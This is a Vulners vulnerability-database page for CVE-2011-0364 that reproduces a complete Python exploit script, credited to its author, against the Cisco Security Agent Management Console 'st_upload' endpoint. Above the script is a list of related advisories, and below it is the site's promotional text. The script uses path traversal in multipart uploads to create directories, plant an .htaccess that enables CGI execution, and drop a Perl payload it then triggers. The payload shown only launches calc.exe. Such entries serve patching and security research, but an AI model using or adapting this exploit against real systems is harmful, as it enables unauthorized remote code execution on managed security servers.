Vulners
Lucene search
Cisco Security Agent Management Console ‘st_upload’ RCE Exploit
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
 | Cisco Security Agent Management Console st_upload File Creation | 19 Feb 201100:00 | – | attackerkb |
 | CVE-2011-0364 | 12 Apr 201100:00 | – | circl |
 | Management Center for Cisco Security Agent Remote Code Execution Vulnerability | 16 Feb 201116:00 | – | cisco |
 | Management Center for Cisco Security Agents Remote Code Execution (cisco-sa-20110216-csa) | 18 Sep 201300:00 | – | nessus |
 | Cisco Security Agent Management Center Code Execution (CVE-2011-0364) | 3 Apr 201100:00 | – | checkpoint_advisories |
 | CVE-2011-0364 | 18 Feb 201123:00 | – | cve |
 | CVE-2011-0364 | 18 Feb 201123:00 | – | cvelist |
 | Cisco Security Agent Management Console - 'st_upload' Remote Code Execution | 12 Apr 201100:00 | – | exploitdb |
 | Cisco Security Agent Management Console - st_upload Remote Code Execution | 12 Apr 201100:00 | – | exploitpack |
 | CVE-2011-0364 | 19 Feb 201101:00 | – | nvd |
10
#!/usr/bin/env python
# Exploits Cisco Security Agent Management Console ‘st_upload’ (CVE-2011-0364)
# gerry eisenhaur <[email protected]>
import httplib
import mimetools
import StringIO
_boundary = mimetools.choose_boundary()
_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'
_csamc = "192.168.0.108"
# we need to enable some scripting to get command access
htaccess = "Options +Includes +ExecCGI\r\nAddHandler cgi-script gee"
perl_path = "#!c:/program files/cisco/csamc/csamc60/perl/5.8.7/bin/mswin32-x86/perl\r\n",
backdoor = "exec \"calc.exe\";"
def send_request(params=None):
buf = StringIO.StringIO()
headers = {"Content-type": 'multipart/form-data; boundary=%s' % _boundary}
for(key, value) in params.iteritems():
buf.write('--%s\r\n' % _boundary)
buf.write('Content-Disposition: form-data; name="%s"' % key)
buf.write('\r\n\r\n%s\r\n' % value)
buf.write('--' + _boundary + '--\r\n\r\n')
body = buf.getvalue()
conn = httplib.HTTPSConnection(_csamc)
conn.request("POST", "/csamc60/agent", body, headers)
response = conn.getresponse()
print response.status, response.reason
conn.close()
def main():
### Build up required dir tree
dirtree = ["../bin/webserver/htdocs/diag/bin",
"../bin/webserver/htdocs/diag/bin/webserver",
"../bin/webserver/htdocs/diag/bin/webserver/htdocs"]
_params = {
'host_uid': _host_uid,
'jobname': None,
'host': "aa",
'diags': " ",
'diagsu': " ",
'profiler': " ",
'extension': "gee",
}
for path in dirtree:
print "[+] Creating directory: %s" % path
_params['jobname'] = path
send_request(_params)
### Done building path, drop files
print "[+] Dropping .htaccess"
send_request({
'host_uid': _host_uid,
'jobname': '',
'host': "/../bin/webserver/",
'diags': "",
'diagsu': "",
'profiler': htaccess,
'extension': "/../.htaccess",
})
print "[+] Dropping payload"
send_request({
'host_uid': _host_uid,
'jobname': '',
'host': "/../bin/webserver/htdocs/gerry",
'diags': perl_path,
'diagsu': "",
'profiler': backdoor,
'extension': "/../exploit.gee",
})
print "[+] Done, Executing dropped file."
try:
conn = httplib.HTTPSConnection(_csamc, timeout=1)
conn.request("GET", "/csamc60/exploit.gee")
response = conn.getresponse()
print response.status, response.reason
print response.read()
except httplib.ssl.SSLError:
pass
print "[+] Finished."
if __name__ == '__main__':
main()
# 0day.today [2021-09-13] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Apr 2011 00:00Current
CVSS 210
EPSS0.1312